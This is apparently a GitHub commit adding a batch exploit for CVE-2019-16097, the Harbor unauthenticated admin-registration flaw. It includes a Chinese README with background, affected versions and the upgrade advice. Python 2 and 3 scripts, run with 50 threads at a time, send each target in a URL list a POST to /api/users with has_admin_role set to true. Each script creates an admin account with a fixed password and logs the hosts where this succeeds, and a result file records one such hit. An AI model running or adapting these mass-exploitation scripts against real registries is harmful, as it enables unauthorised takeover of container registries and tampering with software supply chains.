add Harbor remote add admin user

beruhan · Sep 25, 2019 · 29d6d3f · 29d6d3f
1 parent c3c6a8e
commit 29d6d3f
Show file tree

Hide file tree

Showing 6 changed files with 146 additions and 0 deletions.
diff --git a/CVE-2019-16097/README.md b/CVE-2019-16097/README.md
@@ -0,0 +1,47 @@
+# CVE-2019-16097-batch
+## 免责声明
+只做安全研究使用，不得做非法测试，后果自行承担！！！
+
+CVE-2019-16097-batch
+
+批量漏洞利用脚本
+
+在 url.txt文件 批量添加目标地址
+
+http://1.1.1.1
+http://2.2.2.2
+
+使用python 运行 此脚本 在 result.txt 可以看到最终的验证结果
+
+## 漏洞背景
+近日，镜像仓库Harbor爆出任意管理员注册漏洞，攻击者在请求中构造特定字符串，在未授权的情况下可以直接创建管理员账号，从而接管Harbor镜像仓库。我们得到消息，第一时间对该漏洞进了验证，官方已发布公告说明，最新的1.7.6和1.8.3已修复此漏洞，请使用到的用户尽快升级至安全版本。
+
+## 漏洞描述
+
+Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器。Harbor 1.7.0版本至1.8.2版本中的core/api/user.go文件存在安全漏洞。攻击者通过在请求中添加关键参数，即可利用该漏洞创建管理员账户，从而接管Harbor镜像仓库。
+
+
+## 影响版本
+
+Harbor 1.7.0版本至1.8.2版本
+
+
+## 漏洞复现
+
+我们通过编写批量验证脚本，成功复现了该漏洞。
+![file](../img/40.png)
+
+## 安全建议
+
+升级Harbor版本到 1.7.6 和 1.8.3
+
+参考下载链接：https://github.com/goharbor/harbor/releases
+
+
+## 参考链接
+
+https://github.com/evilAdan0s/CVE-2019-16097
+
+https://github.com/goharbor/harbor/issues/8951
+
+https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
diff --git a/CVE-2019-16097/cve-2019-16097-batch-py2.py b/CVE-2019-16097/cve-2019-16097-batch-py2.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+# author:rocky
+# datetime:2019-09-21 00:43
+# software: PyCharm
+
+
+import requests
+import logging
+import threading
+
+__author__ = 'rocky'
+__date__ = '2019/9/21'
+
+
+def poc(url):
+    bug_url = url + "/api/users"
+    payload = '{"username":"test","email":"[email protected]","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'
+    header = {"Content-Type": "application/json", "Accept": "application/json"}
+    try:
+        r = requests.post(bug_url, data=payload, headers=header, timeout=10)
+        print bug_url
+        print r.status_code
+        if r.status_code == 201:
+            print "[!] This URL is Vulnerable !"
+            print "[!] username: test   password: qq123123"
+
+            f.write(url + "[!] This URL is Vulnerable ! [!] username: test   password: qq123123 " + "\n")
+        else:
+            print "[-] It's nothing."
+
+    except Exception as e:
+        logging.warning(bug_url)
+        print e
+
+
+if __name__ == '__main__':
+    print "CVE-2019-16097-batch"
+    print "author: " + __author__
+    print "date: " + __date__
+    f = open("result.txt", "a")
+    url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
+    for url in url_list:
+        threading.Thread(target=poc, args=(url,)).start()
+        while 1:
+            if (len(threading.enumerate()) < 50):
+                break
diff --git a/CVE-2019-16097/cve-2019-16097-batch-py3.py b/CVE-2019-16097/cve-2019-16097-batch-py3.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+# author:rocky
+# datetime:2019-09-21 00:43
+# software: PyCharm
+
+import requests
+import logging
+import threading
+
+__author__ = 'rocky'
+__date__ = '2019/9/21'
+
+
+def poc(url):
+    bug_url = url + "/api/users"
+    payload = '{"username":"test","email":"[email protected]","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'
+    header = {"Content-Type": "application/json", "Accept": "application/json"}
+    try:
+        r = requests.post(bug_url, data=payload, headers=header, timeout=10)
+        print(bug_url)
+        print(r.status_code)
+        if r.status_code == 201:
+            print("[!] This URL is Vulnerable !")
+            print("[!] username: test   password: qq123123")
+
+            f.write(
+                url +
+                "[!] This URL is Vulnerable ! [!] username: test   password: qq123123 "
+                + "\n")
+        else:
+            print("[-] It's nothing.")
+
+    except Exception as e:
+        logging.warning(bug_url)
+        print(e)
+
+
+if __name__ == '__main__':
+    print("CVE-2019-16097-batch")
+    print("author: " + __author__)
+    print("date: " + __date__)
+    f = open("result.txt", "a")
+    url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
+    for url in url_list:
+        threading.Thread(target=poc, args=(url, )).start()
+        while 1:
+            if (len(threading.enumerate()) < 50):
+                break
diff --git a/CVE-2019-16097/result.txt b/CVE-2019-16097/result.txt
@@ -0,0 +1,2 @@
+
+http://192.168.50.233[!] This URL is Vulnerable ! [!] username: test   password: qq123123 
diff --git a/CVE-2019-16097/url.txt b/CVE-2019-16097/url.txt
@@ -0,0 +1 @@
+http://192.168.50.233
diff --git a/img/40.png b/img/40.png
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@

		http://192.168.50.233[!] This URL is Vulnerable ! [!] username: test password: qq123123